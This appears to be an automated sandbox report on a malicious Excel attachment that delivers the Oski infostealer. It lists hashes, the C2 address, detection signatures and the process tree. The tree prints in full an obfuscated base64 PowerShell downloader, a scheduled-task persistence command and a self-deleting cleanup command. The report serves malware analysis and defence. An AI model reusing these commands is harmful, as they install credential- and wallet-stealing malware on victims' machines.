Analysis

  • max time kernel
    300s
  • max time network
    302s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    06/08/2021, 13:54

General

  • Target

    SAMPLE ORDER .xls

  • Size

    43KB

  • MD5

    bc998900cfb06a407c973873ba745776

  • SHA1

    232f5703a4744258407157e9f3b06b4c15171ef8

  • SHA256

    78bbff7297f8be0a95a2c3942c7c8d80bd6d68bc561543ba7c4275eb2e15e649

  • SHA512

    f80a6648c48ae90d9819cf1297358e1da2503a7a6dfad8398d78bdc9d8c6d02bde409b49ff4033fc70f1512003673c381a052491c431d7ff719abe1ac7b0d473

Malware Config

Extracted

Family

oski

C2

185.212.131.198/ww/

Signatures

  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

  • Downloads MZ/PE file
  • Loads dropped DLL 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SAMPLE ORDER .xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4036
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c pO^W^Ers^He^LL -e WwBzAFkAUwBUAEUAbQAuAHQARQB4AFQALgBFAE4AQwBPAEQASQBOAGcAXQA6ADoAdQBOAGkAQwBvAGQAZQAuAEcARQB0AHMAdAByAGkAbgBHACgAWwBTAHkAUwB0AGUAbQAuAGMATwBuAHYARQBSAFQAXQA6ADoAZgByAE8ATQBCAEEAUwBlADYANABTAFQAcgBpAE4ARwAoACIAZABBAEIAeQBBAEgAawBBAEkAQQBCADcAQQBHAFkAQQBiAHcAQgB5AEEAQwBBAEEASwBBAEEAawBBAEcAawBBAFAAUQBBAHgAQQBEAHMAQQBJAEEAQQBrAEEARwBrAEEASQBBAEEAdABBAEcAdwBBAFoAUQBBAGcAQQBEAEUAQQBNAGcAQQB3AEEARABBAEEATQBBAEEANwBBAEMAQQBBAEoAQQBCAHAAQQBDAHMAQQBLAHcAQQBwAEEAQwBBAEEAZQB3AEEAawBBAEcAawBBAEwAQQBBAGkAQQBHAEEAQQBiAGcAQQBpAEEASAAwAEEAZgBRAEEAZwBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEARABRAEEASwBBAEcAWQBBAGQAUQBCAHUAQQBHAE0AQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAZwBBAEcASQBBAGIAZwBCAHcAQQBIAGMAQQBkAEEAQgBxAEEASABrAEEAYwB3AEIAeQBBAEcAbwBBAGQAUQBCAGoAQQBIAGMAQQBaAGcAQgBzAEEARwBvAEEAYQB3AEIAbQBBAEcAcwBBAGMAUQBCAGkAQQBIAFkAQQBkAGcAQgAzAEEAQwBBAEEASwBBAEEAZwBBAEMAUQBBAGEAUQBCAHQAQQBIAFkAQQBaAFEAQgBqAEEASABRAEEAYwB3AEIAagBBAEgARQBBAFkAUQBCADMAQQBHADAAQQBkAHcAQgBqAEEARwBnAEEAYQBBAEIAawBBAEgAVQBBAEkAQQBBAHMAQQBDAEEAQQBKAEEAQgAzAEEARwBnAEEAYwB3AEIAbgBBAEgASQBBAGQAdwBCAGkAQQBIAE0AQQBjAGcAQgBtAEEARwBzAEEAWgBBAEIAcgBBAEcAYwBBAGMAdwBCADAAQQBHADQAQQBhAEEAQgB2AEEAQwBBAEEASwBRAEEATgBBAEEAbwBBAGUAdwBBAGcAQQBHAGsAQQBUAFEAQgBRAEEARwA4AEEAVQBnAEIAVQBBAEMAMABBAGIAUQBCAHYAQQBFAFEAQQBWAFEAQgBzAEEARwBVAEEASQBBAEIAaQBBAEcAawBBAFYAQQBCAHoAQQBIAFEAQQBjAGcAQgBCAEEARQA0AEEAVQB3AEIAbQBBAEUAVQBBAGMAZwBBADcAQQBBADAAQQBDAGcAQgBUAEEASABRAEEAUQBRAEIAUwBBAEgAUQBBAEwAUQBCAEMAQQBFAGsAQQBkAEEAQgB6AEEARgBRAEEAVQBnAEIAQgBBAEUANABBAGMAdwBCAEcAQQBFAFUAQQBjAGcAQQBnAEEAQwAwAEEAYwB3AEIAUABBAEYAVQBBAGMAZwBCAGoAQQBHAFUAQQBJAEEAQQBrAEEARwBrAEEAYgBRAEIAMgBBAEcAVQBBAFkAdwBCADAAQQBIAE0AQQBZAHcAQgB4AEEARwBFAEEAZAB3AEIAdABBAEgAYwBBAFkAdwBCAG8AQQBHAGcAQQBaAEEAQgAxAEEAQwBBAEEATABRAEIARQBBAEUAVQBBAGMAdwBCADAAQQBHAGsAQQBUAGcAQgBoAEEASABRAEEAYQBRAEIAUABBAEcANABBAEkAQQBBAGsAQQBIAGMAQQBhAEEAQgB6AEEARwBjAEEAYwBnAEIAMwBBAEcASQBBAGMAdwBCAHkAQQBHAFkAQQBhAHcAQgBrAEEARwBzAEEAWgB3AEIAegBBAEgAUQBBAGIAZwBCAG8AQQBHADgAQQBPAHcAQQBnAEEAQwBZAEEASQBBAEEAawBBAEgAYwBBAGEAQQBCAHoAQQBHAGMAQQBjAGcAQgAzAEEARwBJAEEAYwB3AEIAeQBBAEcAWQBBAGEAdwBCAGsAQQBHAHMAQQBaAHcAQgB6AEEASABRAEEAYgBnAEIAbwBBAEcAOABBAE8AdwBBAGcAQQBIADAAQQBkAEEAQgB5AEEASABrAEEAZQB3AEEAawBBAEgASQBBAGEAdwBCAG0AQQBHAGsAQQBhAGcAQgB5AEEARwA0AEEAZQBBAEIANQBBAEgAawBBAFoAQQBCAGkAQQBHADAAQQBkAHcAQgBqAEEARwBRAEEAYgBBAEIAdQBBAEgAawBBAGUAUQBCADEAQQBHAEkAQQBaAFEAQgBvAEEARwBJAEEAUABRAEEAawBBAEUAVQBBAGIAZwBCAFcAQQBEAG8AQQBkAEEAQgBGAEEARwAwAEEAYwBBAEEAcgBBAEMAYwBBAFgAQQBCAHMAQQBIAG8AQQBlAGcAQgB1AEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBBADAAQQBDAGcAQgBpAEEARwA0AEEAYwBBAEIAMwBBAEgAUQBBAGEAZwBCADUAQQBIAE0AQQBjAGcAQgBxAEEASABVAEEAWQB3AEIAMwBBAEcAWQBBAGIAQQBCAHEAQQBHAHMAQQBaAGcAQgByAEEASABFAEEAWQBnAEIAMgBBAEgAWQBBAGQAdwBBAGcAQQBDAGMAQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAFkAQQBMAGcAQQB4AEEARABnAEEATQB3AEEAdQBBAEQASQBBAE0AZwBBAHoAQQBDADQAQQBNAHcAQQAwAEEAQwA4AEEAUgB3AEIANABBAEcATQBBAFEAUQBCAGsAQQBHAGsAQQBlAGcAQgBXAEEARwA0AEEAVABRAEIAdQBBAEQARQBBAFUAZwBCAEMAQQBFADgAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEMAQQBBAEoAQQBCAHkAQQBHAHMAQQBaAGcAQgBwAEEARwBvAEEAYwBnAEIAdQBBAEgAZwBBAGUAUQBCADUAQQBHAFEAQQBZAGcAQgB0AEEASABjAEEAWQB3AEIAawBBAEcAdwBBAGIAZwBCADUAQQBIAGsAQQBkAFEAQgBpAEEARwBVAEEAYQBBAEIAaQBBAEQAcwBBAEQAUQBBAEsAQQBHAEkAQQBiAGcAQgB3AEEASABjAEEAZABBAEIAcQBBAEgAawBBAGMAdwBCAHkAQQBHAG8AQQBkAFEAQgBqAEEASABjAEEAWgBnAEIAcwBBAEcAbwBBAGEAdwBCAG0AQQBHAHMAQQBjAFEAQgBpAEEASABZAEEAZABnAEIAMwBBAEMAQQBBAEoAdwBCAG8AQQBIAFEAQQBkAEEAQgB3AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AZwBBAHUAQQBEAEUAQQBPAEEAQQB6AEEAQwA0AEEATQBnAEEAeQBBAEQATQBBAEwAZwBBAHoAQQBEAFEAQQBMAHcAQgBIAEEASABnAEEAWQB3AEIAQgBBAEcAUQBBAGEAUQBCADYAQQBGAFkAQQBiAGcAQgBOAEEARwA0AEEATQBRAEIAUwBBAEUASQBBAFQAdwBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEASQBBAEEAawBBAEgASQBBAGEAdwBCAG0AQQBHAGsAQQBhAGcAQgB5AEEARwA0AEEAZQBBAEIANQBBAEgAawBBAFoAQQBCAGkAQQBHADAAQQBkAHcAQgBqAEEARwBRAEEAYgBBAEIAdQBBAEgAawBBAGUAUQBCADEAQQBHAEkAQQBaAFEAQgBvAEEARwBJAEEATwB3AEEATgBBAEEAbwBBAFkAZwBCAHUAQQBIAEEAQQBkAHcAQgAwAEEARwBvAEEAZQBRAEIAegBBAEgASQBBAGEAZwBCADEAQQBHAE0AQQBkAHcAQgBtAEEARwB3AEEAYQBnAEIAcgBBAEcAWQBBAGEAdwBCAHgAQQBHAEkAQQBkAGcAQgAyAEEASABjAEEASQBBAEEAbgBBAEcAZwBBAGQAQQBCADAAQQBIAEEAQQBPAGcAQQB2AEEAQwA4AEEATgBBAEEAMgBBAEMANABBAE0AUQBBADQAQQBEAE0AQQBMAGcAQQB5AEEARABJAEEATQB3AEEAdQBBAEQATQBBAE4AQQBBAHYAQQBFAGMAQQBlAEEAQgBqAEEARQBFAEEAWgBBAEIAcABBAEgAbwBBAFYAZwBCAHUAQQBFADAAQQBiAGcAQQB4AEEARgBJAEEAUQBnAEIAUABBAEMANABBAFoAUQBCADQAQQBHAFUAQQBKAHcAQQBnAEEAQwBRAEEAYwBnAEIAcgBBAEcAWQBBAGEAUQBCAHEAQQBIAEkAQQBiAGcAQgA0AEEASABrAEEAZQBRAEIAawBBAEcASQBBAGIAUQBCADMAQQBHAE0AQQBaAEEAQgBzAEEARwA0AEEAZQBRAEIANQBBAEgAVQBBAFkAZwBCAGwAQQBHAGcAQQBZAGcAQQA3AEEAQQAwAEEAQwBnAEIAOQBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEAIgApACkAfABJAGUAWAA=
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4064
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        pOWErsHeLL -e WwBzAFkAUwBUAEUAbQAuAHQARQB4AFQALgBFAE4AQwBPAEQASQBOAGcAXQA6ADoAdQBOAGkAQwBvAGQAZQAuAEcARQB0AHMAdAByAGkAbgBHACgAWwBTAHkAUwB0AGUAbQAuAGMATwBuAHYARQBSAFQAXQA6ADoAZgByAE8ATQBCAEEAUwBlADYANABTAFQAcgBpAE4ARwAoACIAZABBAEIAeQBBAEgAawBBAEkAQQBCADcAQQBHAFkAQQBiAHcAQgB5AEEAQwBBAEEASwBBAEEAawBBAEcAawBBAFAAUQBBAHgAQQBEAHMAQQBJAEEAQQBrAEEARwBrAEEASQBBAEEAdABBAEcAdwBBAFoAUQBBAGcAQQBEAEUAQQBNAGcAQQB3AEEARABBAEEATQBBAEEANwBBAEMAQQBBAEoAQQBCAHAAQQBDAHMAQQBLAHcAQQBwAEEAQwBBAEEAZQB3AEEAawBBAEcAawBBAEwAQQBBAGkAQQBHAEEAQQBiAGcAQQBpAEEASAAwAEEAZgBRAEEAZwBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEARABRAEEASwBBAEcAWQBBAGQAUQBCAHUAQQBHAE0AQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAZwBBAEcASQBBAGIAZwBCAHcAQQBIAGMAQQBkAEEAQgBxAEEASABrAEEAYwB3AEIAeQBBAEcAbwBBAGQAUQBCAGoAQQBIAGMAQQBaAGcAQgBzAEEARwBvAEEAYQB3AEIAbQBBAEcAcwBBAGMAUQBCAGkAQQBIAFkAQQBkAGcAQgAzAEEAQwBBAEEASwBBAEEAZwBBAEMAUQBBAGEAUQBCAHQAQQBIAFkAQQBaAFEAQgBqAEEASABRAEEAYwB3AEIAagBBAEgARQBBAFkAUQBCADMAQQBHADAAQQBkAHcAQgBqAEEARwBnAEEAYQBBAEIAawBBAEgAVQBBAEkAQQBBAHMAQQBDAEEAQQBKAEEAQgAzAEEARwBnAEEAYwB3AEIAbgBBAEgASQBBAGQAdwBCAGkAQQBIAE0AQQBjAGcAQgBtAEEARwBzAEEAWgBBAEIAcgBBAEcAYwBBAGMAdwBCADAAQQBHADQAQQBhAEEAQgB2AEEAQwBBAEEASwBRAEEATgBBAEEAbwBBAGUAdwBBAGcAQQBHAGsAQQBUAFEAQgBRAEEARwA4AEEAVQBnAEIAVQBBAEMAMABBAGIAUQBCAHYAQQBFAFEAQQBWAFEAQgBzAEEARwBVAEEASQBBAEIAaQBBAEcAawBBAFYAQQBCAHoAQQBIAFEAQQBjAGcAQgBCAEEARQA0AEEAVQB3AEIAbQBBAEUAVQBBAGMAZwBBADcAQQBBADAAQQBDAGcAQgBUAEEASABRAEEAUQBRAEIAUwBBAEgAUQBBAEwAUQBCAEMAQQBFAGsAQQBkAEEAQgB6AEEARgBRAEEAVQBnAEIAQgBBAEUANABBAGMAdwBCAEcAQQBFAFUAQQBjAGcAQQBnAEEAQwAwAEEAYwB3AEIAUABBAEYAVQBBAGMAZwBCAGoAQQBHAFUAQQBJAEEAQQBrAEEARwBrAEEAYgBRAEIAMgBBAEcAVQBBAFkAdwBCADAAQQBIAE0AQQBZAHcAQgB4AEEARwBFAEEAZAB3AEIAdABBAEgAYwBBAFkAdwBCAG8AQQBHAGcAQQBaAEEAQgAxAEEAQwBBAEEATABRAEIARQBBAEUAVQBBAGMAdwBCADAAQQBHAGsAQQBUAGcAQgBoAEEASABRAEEAYQBRAEIAUABBAEcANABBAEkAQQBBAGsAQQBIAGMAQQBhAEEAQgB6AEEARwBjAEEAYwBnAEIAMwBBAEcASQBBAGMAdwBCAHkAQQBHAFkAQQBhAHcAQgBrAEEARwBzAEEAWgB3AEIAegBBAEgAUQBBAGIAZwBCAG8AQQBHADgAQQBPAHcAQQBnAEEAQwBZAEEASQBBAEEAawBBAEgAYwBBAGEAQQBCAHoAQQBHAGMAQQBjAGcAQgAzAEEARwBJAEEAYwB3AEIAeQBBAEcAWQBBAGEAdwBCAGsAQQBHAHMAQQBaAHcAQgB6AEEASABRAEEAYgBnAEIAbwBBAEcAOABBAE8AdwBBAGcAQQBIADAAQQBkAEEAQgB5AEEASABrAEEAZQB3AEEAawBBAEgASQBBAGEAdwBCAG0AQQBHAGsAQQBhAGcAQgB5AEEARwA0AEEAZQBBAEIANQBBAEgAawBBAFoAQQBCAGkAQQBHADAAQQBkAHcAQgBqAEEARwBRAEEAYgBBAEIAdQBBAEgAawBBAGUAUQBCADEAQQBHAEkAQQBaAFEAQgBvAEEARwBJAEEAUABRAEEAawBBAEUAVQBBAGIAZwBCAFcAQQBEAG8AQQBkAEEAQgBGAEEARwAwAEEAYwBBAEEAcgBBAEMAYwBBAFgAQQBCAHMAQQBIAG8AQQBlAGcAQgB1AEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBBADAAQQBDAGcAQgBpAEEARwA0AEEAYwBBAEIAMwBBAEgAUQBBAGEAZwBCADUAQQBIAE0AQQBjAGcAQgBxAEEASABVAEEAWQB3AEIAMwBBAEcAWQBBAGIAQQBCAHEAQQBHAHMAQQBaAGcAQgByAEEASABFAEEAWQBnAEIAMgBBAEgAWQBBAGQAdwBBAGcAQQBDAGMAQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAFkAQQBMAGcAQQB4AEEARABnAEEATQB3AEEAdQBBAEQASQBBAE0AZwBBAHoAQQBDADQAQQBNAHcAQQAwAEEAQwA4AEEAUgB3AEIANABBAEcATQBBAFEAUQBCAGsAQQBHAGsAQQBlAGcAQgBXAEEARwA0AEEAVABRAEIAdQBBAEQARQBBAFUAZwBCAEMAQQBFADgAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEMAQQBBAEoAQQBCAHkAQQBHAHMAQQBaAGcAQgBwAEEARwBvAEEAYwBnAEIAdQBBAEgAZwBBAGUAUQBCADUAQQBHAFEAQQBZAGcAQgB0AEEASABjAEEAWQB3AEIAawBBAEcAdwBBAGIAZwBCADUAQQBIAGsAQQBkAFEAQgBpAEEARwBVAEEAYQBBAEIAaQBBAEQAcwBBAEQAUQBBAEsAQQBHAEkAQQBiAGcAQgB3AEEASABjAEEAZABBAEIAcQBBAEgAawBBAGMAdwBCAHkAQQBHAG8AQQBkAFEAQgBqAEEASABjAEEAWgBnAEIAcwBBAEcAbwBBAGEAdwBCAG0AQQBHAHMAQQBjAFEAQgBpAEEASABZAEEAZABnAEIAMwBBAEMAQQBBAEoAdwBCAG8AQQBIAFEAQQBkAEEAQgB3AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AZwBBAHUAQQBEAEUAQQBPAEEAQQB6AEEAQwA0AEEATQBnAEEAeQBBAEQATQBBAEwAZwBBAHoAQQBEAFEAQQBMAHcAQgBIAEEASABnAEEAWQB3AEIAQgBBAEcAUQBBAGEAUQBCADYAQQBGAFkAQQBiAGcAQgBOAEEARwA0AEEATQBRAEIAUwBBAEUASQBBAFQAdwBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEASQBBAEEAawBBAEgASQBBAGEAdwBCAG0AQQBHAGsAQQBhAGcAQgB5AEEARwA0AEEAZQBBAEIANQBBAEgAawBBAFoAQQBCAGkAQQBHADAAQQBkAHcAQgBqAEEARwBRAEEAYgBBAEIAdQBBAEgAawBBAGUAUQBCADEAQQBHAEkAQQBaAFEAQgBvAEEARwBJAEEATwB3AEEATgBBAEEAbwBBAFkAZwBCAHUAQQBIAEEAQQBkAHcAQgAwAEEARwBvAEEAZQBRAEIAegBBAEgASQBBAGEAZwBCADEAQQBHAE0AQQBkAHcAQgBtAEEARwB3AEEAYQBnAEIAcgBBAEcAWQBBAGEAdwBCAHgAQQBHAEkAQQBkAGcAQgAyAEEASABjAEEASQBBAEEAbgBBAEcAZwBBAGQAQQBCADAAQQBIAEEAQQBPAGcAQQB2AEEAQwA4AEEATgBBAEEAMgBBAEMANABBAE0AUQBBADQAQQBEAE0AQQBMAGcAQQB5AEEARABJAEEATQB3AEEAdQBBAEQATQBBAE4AQQBBAHYAQQBFAGMAQQBlAEEAQgBqAEEARQBFAEEAWgBBAEIAcABBAEgAbwBBAFYAZwBCAHUAQQBFADAAQQBiAGcAQQB4AEEARgBJAEEAUQBnAEIAUABBAEMANABBAFoAUQBCADQAQQBHAFUAQQBKAHcAQQBnAEEAQwBRAEEAYwBnAEIAcgBBAEcAWQBBAGEAUQBCAHEAQQBIAEkAQQBiAGcAQgA0AEEASABrAEEAZQBRAEIAawBBAEcASQBBAGIAUQBCADMAQQBHAE0AQQBaAEEAQgBzAEEARwA0AEEAZQBRAEIANQBBAEgAVQBBAFkAZwBCAGwAQQBHAGcAQQBZAGcAQQA3AEEAQQAwAEEAQwBnAEIAOQBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEAIgApACkAfABJAGUAWAA=
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3936
        • C:\Users\Admin\AppData\Local\Temp\lzzn.exe
          "C:\Users\Admin\AppData\Local\Temp\lzzn.exe"
          4⤵
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:4724
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BqppCjWADhQ" /XML "C:\Users\Admin\AppData\Local\Temp\tmp8A6E.tmp"
            5⤵
            • Creates scheduled task(s)
            PID:5004
          • C:\Users\Admin\AppData\Local\Temp\lzzn.exe
            "C:\Users\Admin\AppData\Local\Temp\lzzn.exe"
            5⤵
            • Loads dropped DLL
            • Checks processor information in registry
            • Suspicious use of WriteProcessMemory
            PID:5104
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c taskkill /pid 5104 & erase C:\Users\Admin\AppData\Local\Temp\lzzn.exe & RD /S /Q C:\\ProgramData\\148548454549621\\* & exit
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:4284
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /pid 5104
                7⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4328

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/3936-272-0x000001CFB0900000-0x000001CFB0901000-memory.dmp

          Filesize

          4KB

        • memory/3936-279-0x000001CFC8C60000-0x000001CFC8C61000-memory.dmp

          Filesize

          4KB

        • memory/3936-398-0x000001CFB0938000-0x000001CFB0939000-memory.dmp

          Filesize

          4KB

        • memory/3936-397-0x000001CFB0936000-0x000001CFB0938000-memory.dmp

          Filesize

          8KB

        • memory/3936-389-0x000001CFC8CE0000-0x000001CFC8CE1000-memory.dmp

          Filesize

          4KB

        • memory/3936-350-0x000001CFC8BE0000-0x000001CFC8BE1000-memory.dmp

          Filesize

          4KB

        • memory/3936-278-0x000001CFB0933000-0x000001CFB0935000-memory.dmp

          Filesize

          8KB

        • memory/3936-277-0x000001CFB0930000-0x000001CFB0932000-memory.dmp

          Filesize

          8KB

        • memory/4036-114-0x00007FF661D00000-0x00007FF6652B6000-memory.dmp

          Filesize

          53.7MB

        • memory/4036-115-0x00007FF92CFA0000-0x00007FF92CFB0000-memory.dmp

          Filesize

          64KB

        • memory/4036-457-0x00007FF92CFA0000-0x00007FF92CFB0000-memory.dmp

          Filesize

          64KB

        • memory/4036-123-0x00007FF94B200000-0x00007FF94D0F5000-memory.dmp

          Filesize

          31.0MB

        • memory/4036-121-0x00007FF94D100000-0x00007FF94E1EE000-memory.dmp

          Filesize

          16.9MB

        • memory/4036-458-0x00007FF92CFA0000-0x00007FF92CFB0000-memory.dmp

          Filesize

          64KB

        • memory/4036-459-0x00007FF92CFA0000-0x00007FF92CFB0000-memory.dmp

          Filesize

          64KB

        • memory/4036-118-0x00007FF92CFA0000-0x00007FF92CFB0000-memory.dmp

          Filesize

          64KB

        • memory/4036-116-0x00007FF92CFA0000-0x00007FF92CFB0000-memory.dmp

          Filesize

          64KB

        • memory/4036-122-0x00007FF92CFA0000-0x00007FF92CFB0000-memory.dmp

          Filesize

          64KB

        • memory/4036-117-0x00007FF92CFA0000-0x00007FF92CFB0000-memory.dmp

          Filesize

          64KB

        • memory/4036-460-0x00007FF92CFA0000-0x00007FF92CFB0000-memory.dmp

          Filesize

          64KB

        • memory/4724-429-0x0000000005260000-0x0000000005261000-memory.dmp

          Filesize

          4KB

        • memory/4724-431-0x0000000005300000-0x0000000005301000-memory.dmp

          Filesize

          4KB

        • memory/4724-437-0x000000000B980000-0x000000000B9B4000-memory.dmp

          Filesize

          208KB

        • memory/4724-427-0x00000000008E0000-0x00000000008E1000-memory.dmp

          Filesize

          4KB

        • memory/4724-433-0x00000000053A0000-0x00000000053A1000-memory.dmp

          Filesize

          4KB

        • memory/4724-435-0x0000000008BE0000-0x0000000008BF3000-memory.dmp

          Filesize

          76KB

        • memory/4724-434-0x0000000005300000-0x00000000057FE000-memory.dmp

          Filesize

          5.0MB

        • memory/4724-436-0x0000000009110000-0x00000000091A3000-memory.dmp

          Filesize

          588KB

        • memory/4724-432-0x00000000051C0000-0x00000000051C1000-memory.dmp

          Filesize

          4KB

        • memory/4724-430-0x0000000005800000-0x0000000005801000-memory.dmp

          Filesize

          4KB

        • memory/5104-461-0x0000000000400000-0x0000000000438000-memory.dmp

          Filesize

          224KB

        • memory/5104-442-0x0000000000400000-0x0000000000438000-memory.dmp

          Filesize

          224KB